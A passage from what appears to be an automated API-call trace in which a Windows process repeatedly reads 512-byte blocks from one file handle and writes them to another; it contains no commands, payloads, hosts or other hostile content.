nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.302] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.302] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.303] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.303] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.304] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.305] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.306] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.306] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.307] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.307] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.308] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.308] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.309] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.309] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.310] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.310] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.311] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.311] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.312] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.312] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.313] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.313] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.314] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.314] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.315] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.315] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.316] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.316] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.317] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.317] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.318] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.318] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.319] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.319] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.320] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.320] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.321] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.321] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.322] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.322] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.323] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.323] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.323] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.324] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.324] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.325] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.325] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.326] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.326] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.327] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.327] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.328] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.328] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.329] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.329] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.330] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.330] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.331] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.331] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x1fb, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.332] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.332] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.333] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.333] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.334] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.334] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.335] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.335] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.336] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.336] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.336] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.337] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.337] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.338] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.338] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.339] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.339] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.340] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.340] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.341] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.341] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.342] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.342] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.343] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.343] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.344] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.344] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.345] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.345] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.346] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.346] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.347] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.347] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.349] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.349] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.350] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.350] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.351] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.351] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, lpOverlapped=0x0 | out: lpBuffer=0x4bd254*, lpNumberOfBytesRead=0x4bd21c*=0x200, lpOverlapped=0x0) returned 1 [0020.352] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3a0*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0 | out: lpBuffer=0x4bd3a0*, lpNumberOfBytesWritten=0x4bd350, lpOverlapped=0x0) returned 1 [0020.352] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd254, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd21c, 